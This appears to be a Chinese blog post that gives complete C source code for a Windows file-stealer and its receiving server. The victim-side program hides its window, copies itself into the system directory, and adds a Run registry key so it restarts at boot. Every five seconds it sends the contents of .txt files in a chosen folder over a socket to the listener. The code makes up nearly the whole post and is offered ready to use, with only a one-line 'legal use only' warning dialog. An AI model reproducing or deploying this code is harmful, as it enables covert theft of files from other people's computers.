Windows编程
窃取对方自定义目录下的文件
加入注册表+自动隐藏自身
我这里是如图所示的目录
C:\Binggo下有一个123.txt的文件里面内容随便写(被窃取端)
实时窃取我后面新建了1212.txt也能窃取的到
完整代码如下,大佬勿喷
被窃取端代码
#include<stdio.h>
#include<windows.h>
#include<io.h>
#pragma comment(lib, "ws2_32.lib")
int SendtoServer(const char* path)
{
//初始化网络库
WORD wVersionRequested;
WSADATA wsaData;
int err;
char sendBuf[1024] = { 0 };
wVersionRequested = MAKEWORD(2, 2);
//初始化套接字库
err = WSAStartup(wVersionRequested, &wsaData);
if (err != 0)
{
printf("WSAStartup errNum=%d\n", GetLastError());
return 0;
}
if (LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 2)
{
printf("LOBYTE errorNum= %d\n", GetLastError());
WSACleanup();
return-1;
}
//安装电话机 选中函数 按F1
SOCKET sockCli = socket(AF_INET, SOCK_STREAM, 0);
//配置连接的服务器
SOCKADDR_IN addrSrv;
addrSrv.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");//端口
addrSrv.sin_family = AF_INET;//地址类型
addrSrv.sin_port = htons(6000);//端口
//连接服务器
if (SOCKET_ERROR == connect(sockCli, (SOCKADDR*)&addrSrv, sizeof(SOCKADDR)))
{
printf("connect errNum= %d\n", GetLastError());
return -1;
}
//读取文件内容
FILE* fp = fopen(path, "rb");
int len = fread(sendBuf,1,1024,fp);
fclose(fp);
//char recvBuf[100] = { 0 };
//int iLen = recv(sockCli, recvBuf, 100, 0);
//printf("recvBuf=%s\n", recvBuf);
//char sendBuf[100] = "ni hao";
//发送数据
int iLen = send(sockCli, sendBuf, strlen(sendBuf)+1, 0);
if (iLen < 0)
{
printf("send error=%d\n", GetLastError());
return -1;
}
closesocket(sockCli);
WSACleanup();
return 0;
}
int DoSteal(const char *szPath)
{
WIN32_FIND_DATA FindFileData;//FindFileData表示文件
HANDLE hListFile;//文件用句柄来标识
char szFilePath[MAX_PATH] = { 0 };
strcpy(szFilePath, szPath);
strcat(szFilePath, "\\*");
//找到第一个文件
hListFile=FindFirstFile(szFilePath, &FindFileData);
do
{
char mypath[MAX_PATH] = {0};
strcpy(mypath, szPath);
strcat(mypath, FindFileData.cFileName);
if (strstr(mypath, ".txt"))
{
SendtoServer(mypath);
}
printf("mypath = %s\n", mypath);
} while (FindNextFile(hListFile, &FindFileData));
return 0;
}
void AddToSystem()
{
HKEY hKEY;
char CurrentPath[MAX_PATH];
char SysPath[MAX_PATH];
long ret = 0;
LPSTR FileNewName;
LPSTR FileCurrentName;
DWORD type = REG_SZ;
DWORD size = MAX_PATH;
LPCTSTR Rgspath = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
GetSystemDirectory(SysPath, size);
GetModuleFileName(NULL,CurrentPath,size);
FileCurrentName = CurrentPath;
FileNewName = lstrcat(SysPath,"\\Steal.exe");
struct _finddata_t Steal;
printf("retl = %d,FileNewName=%s\n",ret,FileNewName);
if (_findfirst(FileNewName, &Steal) != -1)
{
return;
}
printf("ret2 = %d\n",ret);
int ihow = MessageBox(0, "该程序只允许用于合法的用途", "警告", MB_YESNOCANCEL | MB_ICONWARNING | MB_TOPMOST);
if (ihow == IDCANCEL)
{
exit(0);
}
if (ihow == IDNO)
{
return;//只执行一次
}
//复制文件
ret = CopyFile(FileCurrentName, FileNewName, TRUE);
if (!ret)
{
return;
}
//加入注册表
printf("ret = %d\n",ret);
ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE,Rgspath,0,KEY_WRITE,&hKEY);
if (ret!=ERROR_SUCCESS)
{
RegCloseKey(hKEY);
return;
}
ret = RegSetValueEx(hKEY,"Steal",NULL,type,(const unsigned char*)FileNewName,size);
if (ret != ERROR_SUCCESS)
{
RegCloseKey(hKEY);
return;
}
RegCloseKey(hKEY);
}
void HideMyself()
{
HWND hwnd = GetForegroundWindow();
ShowWindow(hwnd,SW_HIDE);
}
int main()
{
printf("Steal\n");
//隐藏自身
HideMyself();
//添加到启动项
AddToSystem();
//窃取文件
while (true)
{
DoSteal("C:\\Binggo\\");//注意 \\ 目录自定义
Sleep(5000);
}
system("pause");
return 0;
}
窃取端代码
#include <stdio.h>
#include<windows.h>
#pragma comment(lib, "ws2_32.lib")
#define MAX_SIZE 1024
//控制台打印错误码函数
void ErrorHanding(const char*msg)
{
fputs(msg, stderr);
fputc('\n', stderr);
exit(1);
}
int main()
{
//初始化网络库
WORD wVersionRequested; //unsigned short
WSADATA wsaData;
int err;
char msg[MAX_SIZE] = {0};
wVersionRequested = MAKEWORD(2, 2);//将两个byte合并成一个word
//初始化套接字库
err = WSAStartup(wVersionRequested, &wsaData);
if (err != 0)
{
ErrorHanding("WSAStartup err");
}
if (LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 2)
{
printf("LOBYTE errorNum= %d\n", GetLastError());
WSACleanup();
ErrorHanding("LOBYTE error");
return-1;
}
SOCKET hServerSock = socket(PF_INET, SOCK_STREAM, 0);
if (INVALID_SOCKET == hServerSock)//INVALID_SOCKET=0
{
ErrorHanding("socket err");
}
SOCKADDR_IN addrSrv;//结构体
addrSrv.sin_addr.S_un.S_addr = htonl(INADDR_ANY);//地址0.0.0.0
addrSrv.sin_family = AF_INET;//地址类型
addrSrv.sin_port = htons(6000);//端口
if (SOCKET_ERROR == bind(hServerSock, (SOCKADDR*)&addrSrv, sizeof(SOCKADDR)))
{
ErrorHanding("sock error");
}
//监听listen
if (SOCKET_ERROR == listen(hServerSock, 5))
{
ErrorHanding("listen error");
}
SOCKADDR_IN addrCli;
int cliAdrSize = sizeof(SOCKADDR_IN);
SOCKET cliSock;
int strLen = 0;
while(TRUE)
{
cliSock = accept(hServerSock, (SOCKADDR*)&addrCli, &cliAdrSize);
if (SOCKET_ERROR == cliSock)
{
ErrorHanding("accept error");
}
memset(msg,0,MAX_SIZE);
while ((strLen= recv(cliSock,msg,MAX_SIZE,0))!=0)
{
printf("Server msg=%s\n",msg);
}
closesocket(cliSock);
}
closesocket(hServerSock);
WSACleanup();
system("pause");
return 0;
}